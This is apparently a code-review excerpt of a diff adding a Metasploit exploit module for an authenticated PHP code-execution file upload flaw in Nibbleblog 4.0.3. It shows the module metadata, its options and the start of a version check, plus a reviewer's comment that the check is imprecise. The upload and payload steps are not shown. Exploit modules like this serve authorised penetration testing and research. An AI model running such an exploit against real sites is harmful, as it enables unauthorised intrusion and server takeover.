modules/exploits/multi/http/nibbleblog_file_upload.rb

```diff
@@ -0,0 +1,143 @@
+##
+# This module requires Metasploit: http://www.metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(
+      info,
+      'Name'            => 'Nibbleblog File Upload Vulnerability',
+      'Description'     => %q{
+          Nibbleblog contains a flaw that allows a authenticated remote
+          attacker to execute arbitrary PHP code. This module was
+          tested on version 4.0.3.
+        },
+      'License'         => MSF_LICENSE,
+      'Author'          =>
+        [
+          'Unknown', # Vulnerability Disclosure - Curesec Research Team. Author's name?
+          'Roberto Soares Espreto <robertoespreto[at]gmail.com>' # Metasploit Module
+        ],
+      'References'      =>
+        [
+          ['URL', 'http://blog.curesec.com/article/blog/NibbleBlog-403-Code-Execution-47.html']
+        ],
+      'DisclosureDate'  => 'Sep 01 2015',
+      'Platform'        => 'php',
+      'Arch'            => ARCH_PHP,
+      'Targets'         => [['Nibbleblog 4.0.3', {}]],
+      'DefaultTarget'   => 0
+    ))
+
+    register_options(
+      [
+        OptString.new('TARGETURI',  [true, 'The base path to the web application', '/']),
+        OptString.new('USERNAME',   [true, 'The username to authenticate with']),
+        OptString.new('PASSWORD',   [true, 'The password to authenticate with'])
+      ], self.class)
+  end
+
+  def check
+    res = send_request_cgi(
+      'method'      => 'GET',
+      'uri'         => normalize_uri(target_uri.path, 'admin.php')
+    )
+
+    if res && res.code == 200 && res.body.include?('Sign in to Nibbleblog admin area')
```

Comment:
Is there any version string returned in the body that could be checked for 4.0.3? I think the above code will return Appears for all the versions of Nibbleblog.